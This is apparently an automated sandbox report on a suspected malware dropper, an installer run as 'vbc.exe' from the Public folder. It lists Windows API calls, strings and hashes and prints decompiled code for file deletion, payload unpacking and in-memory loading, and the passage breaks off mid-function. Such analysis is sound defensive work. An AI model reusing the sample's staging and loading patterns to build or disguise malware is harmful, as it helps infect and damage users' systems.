                                                					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                                					 *(_t129 + 0x20) = _t56;
                                                					goto L22;
                                                				}
                                                			}

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 00403121
                                                • GetVersion.KERNEL32 ref: 00403127
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                • OleInitialize.OLE32(00000000), ref: 00403178
                                                • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                • GetCommandLineA.KERNEL32(kozkonzcvlkexzh Setup,NSIS Error), ref: 004031A9
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004031BC
                                                • CharNextA.USER32(00000000), ref: 004031E7
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • OleUninitialize.OLE32 ref: 00403337
                                                • ExitProcess.KERNEL32 ref: 00403357
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 0040336A
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403379
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403384
                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403390
                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                • CopyFileA.KERNEL32 ref: 0040340A
                                                • CloseHandle.KERNEL32(00000000), ref: 00403437
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                • ExitProcess.KERNEL32 ref: 0040350B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                • String ID: $ /D=$ _?=$"$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$kozkonzcvlkexzh Setup$~nsu
                                                • API String ID: 3469842172-2720572982
                                                • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				struct _WIN32_FIND_DATAA _v332;
                                                				signed int _t37;
                                                				char* _t49;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t65;
                                                				signed int _t68;
                                                				CHAR* _t70;
                                                				CHAR* _t72;
                                                				char* _t75;
                                                
                                                				_t72 = _a4;
                                                				_t37 = E0040576C(__eflags, _t72);
                                                				_v12 = _t37;
                                                				if((_a8 & 0x00000008) != 0) {
                                                					_t63 = DeleteFileA(_t72); // executed
                                                					asm("sbb eax, eax");
                                                					_t65 =  ~_t63 + 1;
                                                					 *0x423fc8 =  *0x423fc8 + _t65;
                                                					return _t65;
                                                				}
                                                				_t68 = _a8 & 0x00000001;
                                                				__eflags = _t68;
                                                				_v8 = _t68;
                                                				if(_t68 == 0) {
                                                					L5:
                                                					E00405B98(0x421540, _t72);
                                                					__eflags = _t68;
                                                					if(_t68 == 0) {
                                                						E004056D2(_t72);
                                                					} else {
                                                						lstrcatA(0x421540, "\*.*");
                                                					}
                                                					__eflags =  *_t72;
                                                					if( *_t72 != 0) {
                                                						L10:
                                                						lstrcatA(_t72, 0x409010);
                                                						L11:
                                                						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                						_t37 = FindFirstFileA(0x421540,  &_v332);
                                                						__eflags = _t37 - 0xffffffff;
                                                						_a4 = _t37;
                                                						if(_t37 == 0xffffffff) {
                                                							L29:
                                                							__eflags = _v8;
                                                							if(_v8 != 0) {
                                                								_t31 = _t70 - 1;
                                                								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                								__eflags =  *_t31;
                                                							}
                                                							goto L31;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							_t75 =  &(_v332.cFileName);
                                                							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
                                                							__eflags =  *_t49;
                                                							if( *_t49 != 0) {
                                                								__eflags = _v332.cAlternateFileName;
                                                								if(_v332.cAlternateFileName != 0) {
                                                									_t75 =  &(_v332.cAlternateFileName);
                                                								}
                                                							}
                                                							__eflags =  *_t75 - 0x2e;
                                                							if( *_t75 != 0x2e) {
                                                								L19:
                                                								E00405B98(_t70, _t75);
                                                								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                									E00405850(_t72);
                                                									_t52 = DeleteFileA(_t72);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E00404E84(0xfffffff2, _t72);
                                                									} else {
                                                										__eflags = _a8 & 0x00000004;
                                                										if((_a8 & 0x00000004) == 0) {
                                                											 *0x423fc8 =  *0x423fc8 + 1;
                                                										} else {
                                                											E00404E84(0xfffffff1, _t72);
                                                											E004058E6(__eflags, _t72, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E004054BD(_t70, __eflags, _t72, _a8);
                                                									}
                                                								}
                                                								goto L27;
                                                							}
                                                							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                							__eflags = _t61;
                                                							if(_t61 == 0) {
                                                								goto L27;
                                                							}
                                                							__eflags = _t61 - 0x2e;
                                                							if(_t61 != 0x2e) {
                                                								goto L19;
                                                							}
                                                							__eflags =  *((char*)(_t75 + 2));
                                                							if( *((char*)(_t75 + 2)) == 0) {
                                                								goto L27;
                                                							}
                                                							goto L19;
                                                							L27:
                                                							_t55 = FindNextFileA(_a4,  &_v332);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t37 = FindClose(_a4);
                                                						goto L29;
                                                					}
                                                					__eflags =  *0x421540 - 0x5c;
                                                					if( *0x421540 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t37;
                                                					if(_t37 == 0) {
                                                						L31:
                                                						__eflags = _v8;
                                                						if(_v8 == 0) {
                                                							L39:
                                                							return _t37;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t37 = E00405E93(_t72);
                                                							__eflags = _t37;
                                                							if(_t37 == 0) {
                                                								goto L39;
                                                							}
                                                							E0040568B(_t72);
                                                							E00405850(_t72);
                                                							_t37 = RemoveDirectoryA(_t72);
                                                							__eflags = _t37;
                                                							if(_t37 != 0) {
                                                								return E00404E84(0xffffffe5, _t72);
                                                							}
                                                							__eflags = _a8 & 0x00000004;
                                                							if((_a8 & 0x00000004) == 0) {
                                                								goto L33;
                                                							}
                                                							E00404E84(0xfffffff1, _t72);
                                                							return E004058E6(__eflags, _t72, 0);
                                                						}
                                                						L33:
                                                						 *0x423fc8 =  *0x423fc8 + 1;
                                                						return _t37;
                                                					}
                                                					__eflags = _a8 & 0x00000002;
                                                					if((_a8 & 0x00000002) == 0) {
                                                						goto L31;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                • FindClose.KERNEL32(?), ref: 00405620
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3287302484
                                                • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 1001A506
                                                • ReadFile.KERNELBASE(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 1001A53F
                                                • CloseHandle.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                • String ID:
                                                • API String ID: 721982790-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E004061D4() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				void* _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t590;
                                                				signed int* _t607;
                                                				void* _t614;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t614 - 0x40) != 0) {
                                                						 *(_t614 - 0x34) = 1;
                                                						 *(_t614 - 0x84) = 7;
                                                						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                						L132:
                                                						 *(_t614 - 0x54) = _t607;
                                                						L133:
                                                						_t531 =  *_t607;
                                                						_t590 = _t531 & 0x0000ffff;
                                                						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                						if( *(_t614 - 0xc) >= _t565) {
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                							 *(_t614 - 0x40) = 1;
                                                							_t532 = _t531 - (_t531 >> 5);
                                                							 *_t607 = _t532;
                                                						} else {
                                                							 *(_t614 - 0x10) = _t565;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                						}
                                                						if( *(_t614 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t533 =  *(_t614 - 0x84);
                                                							L140:
                                                							 *(_t614 - 0x88) = _t533;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                						__esi =  *(__ebp - 0x60);
                                                						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                						__ecx =  *(__ebp - 0x3c);
                                                						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                						__ecx =  *(__ebp - 4);
                                                						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						if( *(__ebp - 0x38) >= 4) {
                                                							if( *(__ebp - 0x38) >= 0xa) {
                                                								_t97 = __ebp - 0x38;
                                                								 *_t97 =  *(__ebp - 0x38) - 6;
                                                							} else {
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                							}
                                                						} else {
                                                							 *(__ebp - 0x38) = 0;
                                                						}
                                                						if( *(__ebp - 0x34) == __edx) {
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							L60:
                                                							__eax =  *(__ebp - 0x58);
                                                							__edx = __ebx + __ebx;
                                                							__ecx =  *(__ebp - 0x10);
                                                							__esi = __edx + __eax;
                                                							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								_t216 = __edx + 1; // 0x1
                                                								__ebx = _t216;
                                                								__cx = __ax >> 5;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L59:
                                                								if(__ebx >= 0x100) {
                                                									goto L54;
                                                								}
                                                								goto L60;
                                                							} else {
                                                								L57:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xf;
                                                									goto L170;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t202 = __ebp - 0x70;
                                                								 *_t202 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L59;
                                                							}
                                                						} else {
                                                							__eax =  *(__ebp - 0x14);
                                                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                							if(__eax >=  *(__ebp - 0x74)) {
                                                								__eax = __eax +  *(__ebp - 0x74);
                                                							}
                                                							__ecx =  *(__ebp - 8);
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                							L40:
                                                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                							 *(__ebp - 0x48) = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								 *(__ebp - 0x40) = 1;
                                                								__cx = __ax >> 5;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L38:
                                                								__eax =  *(__ebp - 0x40);
                                                								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                									while(1) {
                                                										if(__ebx >= 0x100) {
                                                											break;
                                                										}
                                                										__eax =  *(__ebp - 0x58);
                                                										__edx = __ebx + __ebx;
                                                										__ecx =  *(__ebp - 0x10);
                                                										__esi = __edx + __eax;
                                                										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                										__ax =  *__esi;
                                                										 *(__ebp - 0x54) = __esi;
                                                										__edi = __ax & 0x0000ffff;
                                                										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                										if( *(__ebp - 0xc) >= __ecx) {
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                											__cx = __ax;
                                                											_t169 = __edx + 1; // 0x1
                                                											__ebx = _t169;
                                                											__cx = __ax >> 5;
                                                											 *__esi = __ax;
                                                										} else {
                                                											 *(__ebp - 0x10) = __ecx;
                                                											0x800 = 0x800 - __edi;
                                                											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                											__ebx = __ebx + __ebx;
                                                											 *__esi = __cx;
                                                										}
                                                										 *(__ebp - 0x44) = __ebx;
                                                										if( *(__ebp - 0x10) < 0x1000000) {
                                                											L45:
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t155 = __ebp - 0x70;
                                                											 *_t155 =  *(__ebp - 0x70) + 1;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                										}
                                                									}
                                                									L53:
                                                									_t172 = __ebp - 0x34;
                                                									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                									L54:
                                                									__al =  *(__ebp - 0x44);
                                                									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                									L55:
                                                									if( *(__ebp - 0x64) == 0) {
                                                										 *(__ebp - 0x88) = 0x1a;
                                                										goto L170;
                                                									}
                                                									__ecx =  *(__ebp - 0x68);
                                                									__al =  *(__ebp - 0x5c);
                                                									__edx =  *(__ebp - 8);
                                                									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                									 *( *(__ebp - 0x68)) = __al;
                                                									__ecx =  *(__ebp - 0x14);
                                                									 *(__ecx +  *(__ebp - 8)) = __al;
                                                									__eax = __ecx + 1;
                                                									__edx = 0;
                                                									_t191 = __eax %  *(__ebp - 0x74);
                                                									__eax = __eax /  *(__ebp - 0x74);
                                                									__edx = _t191;
                                                									L79:
                                                									 *(__ebp - 0x14) = __edx;
                                                									L80:
                                                									 *(__ebp - 0x88) = 2;
                                                									goto L1;
                                                								}
                                                								if(__ebx >= 0x100) {
                                                									goto L53;
                                                								}
                                                								goto L40;
                                                							} else {
                                                								L36:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xd;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t121 = __ebp - 0x70;
                                                								 *_t121 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L38;
                                                							}
                                                						}
                                                					}
                                                					L1:
                                                					_t534 =  *(_t614 - 0x88);
                                                					if(_t534 > 0x1c) {
                                                						L171:
                                                						_t535 = _t534 | 0xffffffff;
                                                						goto L172;
                                                					}
                                                					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                                						case 0:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t534 =  *( *(_t614 - 0x70));
                                                							if(_t534 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t538 = _t534 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t610 = _t538 / _t570;
                                                							_t540 = _t538 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t605 = _t540 % _t571 & 0x000000ff;
                                                							 *(_t614 - 0x3c) = _t605;
                                                							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                								L10:
                                                								if(_t613 == 0) {
                                                									L12:
                                                									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t613 = _t613 - 1;
                                                									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                								} while (_t613 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t614 - 4) != 0) {
                                                								GlobalFree( *(_t614 - 4));
                                                							}
                                                							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t614 - 4) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t45 = _t614 - 0x48;
                                                							 *_t45 =  *(_t614 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t614 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t546 =  *(_t614 - 0x40);
                                                							if(_t546 ==  *(_t614 - 0x74)) {
                                                								L20:
                                                								 *(_t614 - 0x48) = 5;
